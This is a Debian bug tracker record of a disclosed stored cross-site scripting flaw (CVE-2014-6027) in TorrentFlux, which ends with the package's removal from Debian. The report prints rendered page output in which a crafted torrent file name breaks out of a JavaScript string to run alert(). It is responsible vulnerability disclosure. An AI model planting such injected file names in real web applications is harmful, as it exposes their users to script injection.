Report forwarded
to debian-bugs-dist@lists.debian.org, Cameron Dale <camrdale@gmail.com>: Bug#759574; Package torrentflux.
(Thu, 28 Aug 2014 17:51:06 GMT) (full text, mbox, link).
Acknowledgement sent
to Nicolas Guigo <nguigo@isecpartners.com>:
New Bug report received and forwarded. Copy sent to Cameron Dale <camrdale@gmail.com>.
(Thu, 28 Aug 2014 17:51:06 GMT) (full text, mbox, link).
Package: torrentflux
Version: 2.4.5-1
The XSS that can be triggered by an unauthenticated attacker. A malicious
torrent file such as the POC attached can be crafted and shared by an
attacker. Upon starting the download from Torrentflux, some of the file
contents are pasted without output encoding into a script section,
triggering the XSS. An alternate vector (authenticated) is for an attacker
to upload the torrent file to his own account and subsequently share a link
the torrent's details (
<http://www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_201
3.12.torrent>
www.vulnserver.com/torrentflux/details.php?torrent=pclinuxos_kde_2013.12.tor
rent).
</td></tr></table><br><div align="left" id="BodyLayer" name="BodyLayer"
style="border: thin solid #000000; position:relative; width:740; height:500;
padding-left: 5px; padding-right: 5px; z-index:1; overflow: scroll;
visibility: visible"><link rel="StyleSheet" href="dtree.css" type="text/css"
/><script type="text/javascript" src="dtree.js"></script><table><tr><tr><td
width="110">Metainfo
File:</td><td>pclinuxos_kde_2013.12.torrent</td></tr><tr><td>Directory
Name:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Announce URL:
<URL:%3c/td%3e%3ctd%3ehttp://linuxtracker.org:2710/0000000000000000000000000
0000000/announce%3c/td%3e%3c/tr%3e%3ctr%3e%3ctd>
</td><td>http://linuxtracker.org:2710/00000000000000000000000000000000/annou
nce</td></tr><tr><td
valign="top">Comment:</td><td>pclinuxos-kde-2013.12</td></tr><tr><td>Created
:</td><td>December 4, 2013, 12:37 pm</td></tr><tr><td>Torrent
Size:</td><td>1698693120 (1.58 GB)</td></tr><tr><td>Chunk
size:</td><td>2097152 (2 MB)</td></tr><tr><td>Selected size:</td><td
id="sel">0</td></tr></table><br>
<form name="priority" action="index.php" method="POST" ><input type="hidden"
name="torrent" value="pclinuxos_kde_2013.12.torrent" ><input type="hidden"
name="setPriorityOnly" value="true" ><script type="text/javascript">
var sel = 0;
d = new dTree('d');
d.add(4,-1,"/",-1,0);
d.add(0,4,"kde-2013.12.jpg (78175)",-1,78175);
d.add(1,4,"pclinuxos-kde-2013.12.iso (1697839104)",-1,1697839104);
d.add(2,4,"pclinuxos-kde-2013.12.md5sum (60)",-1,60);
d.add(3,4,"X");alert('X');//pg (181733)",-1,181733);
document.write(d);
sel = getSizes();
drawSel();
Please find attached the full proof of concept torrent file.
--
Nicolas Guigo
Senior Security Engineer
iSEC Partners (NCC GROUP)
(206) 948-3687
9C80 28B2 F016 4DA4 24C9 D1D7 129C FDF6 0CDC B828
Severity set to 'grave' from 'normal'
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 29 Aug 2014 16:18:10 GMT) (full text, mbox, link).
Added tag(s) upstream and security.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 29 Aug 2014 16:18:11 GMT) (full text, mbox, link).
Marked as found in versions torrentflux/2.4-5.
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Fri, 29 Aug 2014 16:18:12 GMT) (full text, mbox, link).
Changed Bug title to 'torrentflux: CVE-2014-6027: XSS in TorrentFlux' from 'XSS in TorrentFlux'
Request was from Salvatore Bonaccorso <carnil@debian.org>
to control@bugs.debian.org.
(Wed, 03 Sep 2014 04:36:07 GMT) (full text, mbox, link).
Reply sent
to Debian FTP Masters <ftpmaster@ftp-master.debian.org>:
You have taken responsibility.
(Wed, 10 Sep 2014 10:42:44 GMT) (full text, mbox, link).
Notification sent
to Nicolas Guigo <nguigo@isecpartners.com>:
Bug acknowledged by developer.
(Wed, 10 Sep 2014 10:42:44 GMT) (full text, mbox, link).
To: 398537-done@bugs.debian.org,407061-done@bugs.debian.org,407065-done@bugs.debian.org,407066-done@bugs.debian.org,428076-done@bugs.debian.org,481894-done@bugs.debian.org,669787-done@bugs.debian.org,677061-done@bugs.debian.org,759573-done@bugs.debian.org,759574-done@bugs.debian.org,
Subject: Bug#761008: Removed package(s) from unstable
Date: Wed, 10 Sep 2014 10:40:15 +0000
Version: 2.4-5.1+rm
Dear submitter,
as the package torrentflux has just been removed from the Debian archive
unstable we hereby close the associated bug reports. We are sorry
that we couldn't deal with your issue properly.
For details on the removal, please see https://bugs.debian.org/761008
The version of this package that was in Debian prior to this removal
can still be found using http://snapshot.debian.org/.
This message was generated automatically; if you believe that there is
a problem with it please contact the archive administrators by mailing
ftpmaster@ftp-master.debian.org.
Debian distribution maintenance software
pp.
Scott Kitterman (the ftpmaster behind the curtain)
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Sun, 26 Apr 2015 07:50:59 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.
